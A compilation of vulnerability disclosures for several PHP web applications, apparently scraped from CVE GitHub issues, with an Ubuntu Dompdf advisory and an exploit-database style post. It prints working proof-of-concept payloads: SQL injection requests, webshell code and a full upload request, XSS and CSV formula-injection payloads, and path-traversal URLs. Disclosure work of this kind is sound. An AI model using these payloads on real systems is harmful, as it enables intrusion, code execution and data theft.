Cross Site Scripting (XSS) vulnerability in adm_user parameter in Gila CMS version 1.11.3, allows remote attackers to execute arbitrary code during the Gila CMS installation.

**XSS on Gila CMS Installation**

**Gila CMS version 1.11.3**

1: Admin Username

<input name="adm_user" placeholder="Your Name" required="">

adm\_user

/install/install.sql.php

    $_user=$_POST['adm_user'];
    $_email=$_POST['adm_email'];
    $_pass=password_hash($_POST['adm_pass'], PASSWORD_BCRYPT);
    
    $link->query("INSERT INTO userrole(id,userrole) VALUES(1,'Admin');");
    $link->query("INSERT INTO user(id,username,email,pass,active,reset_code) VALUES(1,'$_user','$_email','$_pass',1,'');");
    

2:Login in admin pane

XSS

Visit the website

3:Reference

https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)

CVE-2020-20523: XSS on Gila CMS Installation · Issue #41 · GilaCMS/gila

SQL Injection vulnerability in file Base_module_model.php in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the col parameter to function list_items.

Parameter Name:col  
Parameter Type: GET  
Attack Pattern: extractvalue(1,concat(char(126),(select/\*\*/current\_user())))

    GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))&fuel_inline=0 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://127.0.0.1/fuel/pages
    Cookie: ci_session=cfe42220d7540c849f2fdd72ddb732ff0e6addfb; fuel_74d00769f76d3dfc59096d1a4f6419d3=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_74d00769f76d3dfc59096d1a4f6419d3=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%257D

CVE-2020-24950: Vulnerability -  SQL Injection · Issue #562 · daylightstudio/FUEL-CMS

SQL Injection vulnerability in cskaza cszcms version 1.2.9, allows attackers to gain sensitive information via pm_sendmail parameter in csz_model.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-36136: Bug Report: SQL injection vulnerability · Issue #26 · cskaza/cszcms

An issue was disocvered in wuzhicms version 4.1.0, allows remote attackers to execte arbitrary code via the setting parameter to the ueditor in index.php.

The location where the vulnerability was triggered：  
/coreframe/app/attachment/admin/index.php

Locate the function "ueditor", when the parameter "submit" exists, the value of "setting" will be passed to the function "set\_cache" for execution.  
When the parameter "submit" does not exist, the content of the cache file will be executed directly;

The "set\_cache" function does not filter the variable "data" (the parameter "setting" passed in) and saves it directly in the cache file:

The saved cache file path is: /caches/_cache_/ ueditor.dt72K.php

So we can construct the following poc：

http://192.168.114.150/index.php?m=attachment&f=index&v=ueditor&_su=wuzhicms&submit=1&setting=<?php echo phpinfo();?> 

**Vulnerability recurrence**

First：log in system

Second：Execute poc:  

You can see that the shell file is successfully written:

Third：Visit:

http://192.168.114.150/index.php?m=attachment&f=index&v=ueditor&_su=wuzhicms

You can see the successful execution of the shell script:

**Repair method**

Strictly filter the parameter setting;

CVE-2020-36037: wuzhicms v4.1.0 has a write webshell vulnerability · Issue #192 · wuzhicms/wuzhicms

File Upload vulnerability in bloofoxCMS version 0.5.2.1, allows remote attackers to execute arbitrary code and escalate privileges via crafted webshell file to upload module.

I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.  
After entering the web management background, we can use the upload function to upload files：  
  
We create a new webshell file and name it script.php ：

    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
    

Click to select this file(script.php) :  
  
Click upload file(s) and grab the data package:  
  
First request package:

    POST /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------36808327791705981033859481452
    Content-Length: 1187
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="dir"
    
    ../media/images/
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file1"; filename="script.php"
    Content-Type: application/octet-stream
    
    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
     
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file2"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file3"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file4"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file5"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="send"
    
    Upload File(s)
    -----------------------------36808327791705981033859481452--
    
    

First response package ：

    HTTP/1.1 302 Found
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:43:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    LOCATION: index.php?mode=tools&page=upload
    Content-Length: 0
    

Then we follow 302 redirection，  
Second request package ：

    GET /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    

Second response package ：

    HTTP/1.1 200 OK
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:44:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 6820
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html>
    <head>
    <title>bloofoxCMS Admincenter</title>
    <meta http-equiv="Content-Type" content="text/html; charset=" />
    <meta name="AUTHOR" content="bloofox, Alexander Lang" />
    <meta name="COPYRIGHT" content="bloofox.com, Alex Lang" />
    <meta name="DATE" content="12/25/2020" />
    <meta name="DESCRIPTION" content="bloofoxCMS Admincenter is the backend for managing the contents of bloofoxCMS" />
    <meta name="TITLE" content="bloofoxCMS Admincenter" />
    <link rel="stylesheet" type="text/css" href="../templates/admincenter/admincenter.css" />
    <link rel="icon" href="../media/images/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="../media/images/favicon.ico" type="image/x-icon" />
    
    <script type="text/javascript" src="functions.js"></script>
    
    </head>
    
    <body>
    <div id="profile">
    	<a class='edit' href='index.php?page=myprofile' title='Edit Profile'><img src='../templates/admincenter/images/icon-set16/profile_edit.png' alt='Edit Profile' border='0' width='16' height='16' /></a>  <a href='index.php?page=myprofile'>Edit Profile</a><br />
    	<a class='edit' href='index.php?page=changepw' title='Change Password'><img src='../templates/admincenter/images/icon-set16/edit.png' alt='Change Password' border='0' width='16' height='16' /></a>  <a href='index.php?page=changepw'>Change Password</a><br /> 
    	<a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a><br />
    	
    	<div class="close">
    	<a href="#" onclick="show_hide_layers('profile','','hide');">Close [x]</a>
    	</div>
    </div>
    
    <div id="wrap">
    	<div id="header">
    	<div style="float: left;"><span class="bold">bloofoxCMS Admincenter</span></div>
    	<div style="text-align: right; font-size: 11px; font-weight: bold;">
    	<a href="#" onclick="show_hide_layers('profile','','show');">Username: admin</a> &nbsp;&nbsp; <a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a></div> 
    	<hr />
    	</div>
    	
    	<div id="sidebar">
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php" title='Home'>Home</a></li> 
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=content" title='Contents'>Contents</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=content&page=levels">Structure</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=pages">Pages</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=articles">Articles</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=media">Media</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=settings" title='Administration'>Administration</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=settings">Settings</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=projects">Projects</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=lang">Languages</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=tmpl">Templates</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=plugins">Plugins</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=charset">Charsets</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=user" title='Security'>Security</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=user">User</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=groups">User Groups</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=permissions">Permissions</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=sessions">Sessions</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='current' href="index.php?mode=tools" title='Tools'>Tools</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=tools">Maintenance</a></li>
    	<li><a class='subcurrent' href="index.php?mode=tools&page=upload">Upload</a></li>
    	
    	
    	<li><a class='subalways' href="index.php?mode=tools&page=phpmyadmin">PhpMyAdmin</a></li>
    	<li><a class='subalways' href="index.php?mode=tools&page=stats">Statistics</a></li>
    </ul>
    </div>
    </div>
    	<div id="space"></div>
    	<div id="main" onclick="show_hide_layers('profile','','hide');">
    		<div id="content">
    		
    		
    <h2>Tools / Upload</h2>
    <div id="content-inlay">
    
    <p class='ok'><img src='../templates/admincenter/images/icon-set16/ok.png' alt='ok.png' border='0' width='16' height='16' /> Files have been uploaded successful.</p>
    
    <form action="index.php?mode=tools&page=upload" method="post" enctype="multipart/form-data">
    <table class="list">
    <tr class='bg_color3'>
    	<td width="150"></td>
    	<td></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Directory</td>
    	<td><select name='dir'><option value='../media/images/'>../media/images/</option><option value='../media/files/'>../media/files/</option><option value='../languages/'>../languages/</option><option value='../templates/admincenter'>../templates/admincenter</option><option value='../templates/default'>../templates/default</option><option value='../media/images/profiles'>../media/images/profiles</option></select></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Template Image</td>
    	<td><input type='checkbox' name='tmplimage' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file1' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file2' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file3' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file4' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file5' size='30' maxlength='250' /></td>
    </tr>
    </table>
    <br />
    <input class='btn' type='submit' name='send' value='Upload File(s)' />
    </form>
    </div>
    
    		
    		</div>
    	</div>
    
    	<div id="footer">
    	<hr />
    	<div style="text-align: right; float: right; font-size: 11px;"><a href='#'>Back to Top</a></div>
    	<div style="text-align: left; font-size: 11px;">
    Powered by <a href="http://www.bloofox.com" target="bloofox">bloofoxCMS</a> &copy; 2012</div>
    	</div>
    </div>
    
    </body>
    </html>
    

We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php  

Finally, we can access the webshell address and execute any command：

CVE-2020-36082: An arbitrary file upload vulnerability was found · Issue #7 · alexlang24/bloofoxCMS

Cross Site Scripting (XSS) vulnerability in ChurchCRM version 4.2.1, allows remote attckers to execute arbitrary code and gain sensitive information via crafted payload in Add New Deposit field in View All Deposit module.

**Name:** Stored Cross Site Scripting leading to Remote File Inclusion vulnerability  
**Description:** ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit.  
Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.  
**Impact:** The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions.  
**Version Affected:** 4.2.1 and below  
**Payload Used:**  
<script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click(); </script>  
**Vulnerable URL:** /master/FindDepositSlip.php  
**Vulnerable Parameters:** Deposit Comment  
**Steps to Reproduce:**

1.  Login to the application, go to 'View all Deposits' module.
2.  Add the payload in the 'Deposit Comment' field and click "Add New Deposit".
3.  Payload is executed and a .exe file is downloaded.

**Reference :**  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17205  
**POC :**  
  
  
**Mitigation:**  
Proper input validation and encoding should be employed to prevent the execution of any hazardous scripts.  
**Note:** There are multiple locations apart from Deposit module where the input is not sanitized properly

CVE-2020-28849: Cross Site Scripting Vulnerability leading to Remote File Inclusion · Issue #5477 · ChurchCRM/CRM

CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file.

**Vulnerability Name:** CSV Injection/ Formula Injection  
**Severity:** High  
**Description:** CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file.  
**Impact:** Arbitrary formulas can be injected into CSV files which can lead to remote code execution at the client or data leakage via maliciously injected hyper-links.  
**Version Affected:** 4.2.0  
**Payload Used:** =10+20+cmd|' /C calc'!A0  
**Vulnerable URL:** master/EventNames.php  
**Vulnerable Parameters:** Name  
**Steps to Reproduce:**

1.  Login to the application, goto 'Events' module and then "List Event Types"
2.  Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field
3.  Now goto 'List Event types' module and click CSV to download the CSV file
4.  Open the CSV file, allow all popups and our payload is executed (calculator is opened).  
      
    

**Note:** Incase the payload does not execute, then enable 'External Content' and 'Macro' settings in Excel. Goto Excel > File > Options > Trust Center > Trust Center Settings > Macro/External Content.  
**References:**  
https://nvd.nist.gov/vuln/detail/CVE-2019-12134  
http://cwe.mitre.org/data/definitions/1236.html

Just to confirm, this is not an issue with our CSV import but if a row had bad data the exported CVS has an issue. We use https://datatables.net/ if you have a chance, maybe you can help see if they have fixed that.

@DawoudIO I think the problem lies in the export feature. It would be nice to have an option in download csv to escape strings that begin with "+","-","@", or "=" by prepending "\\t".  
For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

I'm not seeing how this is a particularly useful bug report. Anyone can create a CSV file with any arbitrary text in it using **any text editor** or text generation tool. How using ChurchCRM to generate a CSV with questionable content is a "bug" leaves me perplexed. For example, this logic implies the bash echo command has this same _"bug"_ too:

echo -e "Header 1, Header 2, Header 3\\n1,=10+20+cmd|' /C calc'!A0,Foo bar\\n2,Hello world,Text text" \> test.csv

If there was a method to use unauthenticated access to ChurchCRM that allowed insertion of arbitrary data values AND generate a CSV AND somehow send that somewhere then _maybe_ I'd consider this a flaw in ChurchCRM. Maybe I'm missing something?

I understand that this vulnerability would be much impactful if any unauthenticated user would be able to inject the payload resulting into code execution on the internal user's system. However this could also be impactful, if any internal user of the application enters the payload which results into impacting all the other user of the application. Here the payload is entered on ChurchCRM application leaving the application at fault to generate a file which can execute malicious commands on the user's system. A user may embed Dynamic Data Exchange (DDE) formulas to perform code execution, download a backdoor, open a malicious website etc.  
The legitimate user may download the file because of following reasons:

1.  The user trusts the site that the content is coming from.
2.  The user assumes that it is only a csv file and that it won't contain functions or macro's and won't care about any warnings from Excel about potential malicious functionality in the file.

https://owasp.org/www-community/attacks/CSV\_Injection#:~:text=CSV%20Injection%2C%20also%20known%20as,the%20software%20as%20a%20formula.  
https://payatu.com/csv-injection-basic-to-exploit

Feel free to create a PR.

CVE-2020-28848: CSV Injection Vulnerability · Issue #5465 · ChurchCRM/CRM

SQL Injection vulnerability in oretnom23 School Faculty Scheduling System version 1.0, allows remote attacker to execute arbitrary code, escalate privilieges, and gain sensitive information via crafted payload to id parameter in manage_user.php.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2020-36034: GitHub - TCSWT/School-Faculty-Scheduling-System

Ubuntu Security Notice 6277-2 - USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the corresponding updates for Ubuntu 22.04 LTS. It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6277-2  
August 10, 2023

php-dompdf vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Dompdf.

Software Description:  
- php-dompdf: HTML to PDF converter

Details:

USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the  
corresponding updates for Ubuntu 22.04 LTS.

Original advisory details:

  It was discovered that Dompdf was not properly validating untrusted input when  
  processing HTML content under certain circumstances. An attacker could  
  possibly use this issue to expose sensitive information or execute arbitrary  
  code. This issue only affected Ubuntu 16.04 LTS.  
  (CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)

  It was discovered that Dompdf was not properly validating processed HTML  
  content that referenced PHAR files, which could result in the deserialization  
  of untrusted data. An attacker could possibly use this issue to execute  
  arbitrary code. (CVE-2021-3838)

  It was discovered that Dompdf was not properly validating processed HTML  
  content that referenced both a remote base and a local file, which could  
  result in the bypass of a chroot check. An attacker could possibly use this  
  issue to expose sensitive information. (CVE-2022-2400)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   php-dompdf                      0.6.2+dfsg-3.1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6277-2  
   https://ubuntu.com/security/notices/USN-6277-1  
   CVE-2021-3838, CVE-2022-2400

Package Information:  
https://launchpad.net/ubuntu/+source/php-dompdf/0.6.2+dfsg-3.1ubuntu0.1

Ubuntu Security Notice USN-6277-2

i2soft CMS version 2.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : i2soft CMS v2.0 Insecure Direct Object Reference Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.i2softbd.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload 1 : /Admin/menu.php[+] use payload 2 : Admin/container.php?p=../footer.html[+] now you can modify footer page or read other files[+] https://wtaazakhobor24com/Admin/container.php?p=../footer.htmlGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#php